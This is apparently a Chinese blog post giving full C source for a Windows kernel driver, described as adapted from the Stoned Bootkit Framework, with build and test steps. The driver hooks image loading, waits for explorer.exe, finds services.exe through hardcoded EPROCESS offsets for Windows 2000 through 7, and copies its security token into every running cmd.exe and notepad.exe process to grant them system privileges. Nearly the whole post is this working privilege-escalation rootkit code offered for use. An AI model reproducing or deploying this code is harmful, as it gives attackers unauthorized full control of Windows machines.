本驱动程序是Stoned Bootkit Framework中的一部分,修改部分code实现重启桌面后对cmd和记事本进行提权;
编译环境:
WDK 7600.16385.0
测试方法:
首先运行cmd或记事本,然后加载驱动程序,重新启动桌面进程explorer.exe,此时打开任务管理器,即可看到效果如图:
代码如下:
//win7提权
//code by Peter Kleissner
#include "ntddk.h"
#include "ntdddisk.h"
#include "windef.h"
#define SbNotifyDriverLoad 0
#define SbInstallWindowsHook 2
#define HookType_Hook 0
#define HookType_Intercept 1
struct
{
void * FunctionName;
void * FunctionHook;
unsigned Type;
} Hook;
void PrivilegeEscalation(IN PVOID StartContext);
void NotifyRoutine(IN PUNICODE_STRING FullImageName, IN HANDLE ProcessId, IN PIMAGE_INFO ImageInfo);
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
{
HANDLE ThreadHandle;
OBJECT_ATTRIBUTES ObjectAttributes;
DbgPrint("\nhere we go!\n\n");
InitializeObjectAttributes(&ObjectAttributes, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
PsSetLoadImageNotifyRoutine(&NotifyRoutine);
return STATUS_SUCCESS;
}
void NotifyRoutine(IN PUNICODE_STRING FullImageName, IN HANDLE ProcessId, IN PIMAGE_INFO ImageInfo)
{
DbgPrint("Image Load: %wZ\n", FullImageName);
if(_wcsnicmp(FullImageName->Buffer, L"\\Device\\HarddiskVolume1\\Windows\\explorer.exe", 51) == 0 )
PrivilegeEscalation(NULL);
}
void PrivilegeEscalation(IN PVOID StartContext)
{
PEPROCESS CurrentProcess, ServiceProcess, FirstProcess;
DWORD ServiceSecurityToken;
RTL_OSVERSIONINFOW OSVersionInfo;
DWORD OffsetAPL, OffsetIN, OffsetST;
CurrentProcess = IoGetCurrentProcess();
OSVersionInfo.dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOW);
PsGetVersion(&OSVersionInfo.dwMajorVersion, &OSVersionInfo.dwMinorVersion, NULL, NULL);
if (!(OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 0)) // RtlGetVersion() is only support on XP and higher
RtlGetVersion(&OSVersionInfo);
if (OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 0) // Windows 2000
{ OffsetAPL = 0xA0; OffsetIN = 0x15C; OffsetST = 0x8C; }
else if (OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 1) // Windows XP
{ OffsetAPL = 0x88; OffsetIN = 0xEC; OffsetST = 0x40; }
else if (OSVersionInfo.dwMajorVersion == 5 && OSVersionInfo.dwMinorVersion == 2) // Windows Server 2003
{ OffsetAPL = 0x88; OffsetIN = 0xCC; OffsetST = 0x40;
if (OSVersionInfo.dwBuildNumber == 3790) OffsetAPL += 0x10; } // Windows Server 2003 R2
else if (OSVersionInfo.dwMajorVersion == 6 && OSVersionInfo.dwMinorVersion == 0) // Windows Vista, Windows Server 2008
{ OffsetAPL = 0xA0; OffsetIN = 0xAC; OffsetST = 0x40; }
else if (OSVersionInfo.dwMajorVersion == 6 && OSVersionInfo.dwMinorVersion == 1) // Windows 7 RC
{ OffsetAPL = 0xB8; OffsetIN = 0xB4; OffsetST = 0x40;
if (OSVersionInfo.dwBuildNumber == 7000) OffsetIN = 0xAC; } // Windows 7 Beta
else
{
DbgPrint("this is only supported on win 7\n");
return;
}
// find services.exe process structure
ServiceProcess = *(PEPROCESS *)((BYTE *)CurrentProcess + OffsetAPL);
ServiceProcess = *(PEPROCESS *)(ServiceProcess);
while (1)
{
DbgPrint("Found Process: %s\n", (char *)ServiceProcess + OffsetIN);
if (_stricmp((char *)ServiceProcess + OffsetIN, "services.exe") == 0)
break;
ServiceProcess = *(PEPROCESS *)(ServiceProcess);
}
ServiceSecurityToken = *(DWORD *)((DWORD *)ServiceProcess + OffsetST/4);
DbgPrint("System Service Security Token: %08x\n", ServiceSecurityToken);
// now escalate any cmd.exe, notepad.exe, King Kleissner process
CurrentProcess = *(PEPROCESS *)((BYTE *)CurrentProcess + OffsetAPL);
for (FirstProcess = CurrentProcess; FirstProcess != *(PEPROCESS *)(CurrentProcess); CurrentProcess = *(PEPROCESS *)(CurrentProcess))
{
if ( _stricmp((char *)CurrentProcess + OffsetIN, "cmd.exe") == 0 ||
_stricmp((char *)CurrentProcess + OffsetIN, "notepad.exe") == 0 )
{
DbgPrint("Overwriting old Security Token: %08x\n", *(DWORD *)((DWORD *)CurrentProcess + OffsetST/4));
ObReferenceObject((void *)ServiceSecurityToken);
*(DWORD *)((DWORD *)CurrentProcess + OffsetST/4) = ServiceSecurityToken;
DbgPrint("cmd.exe privilege escalated successfully!\n");
}
}
}
330
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
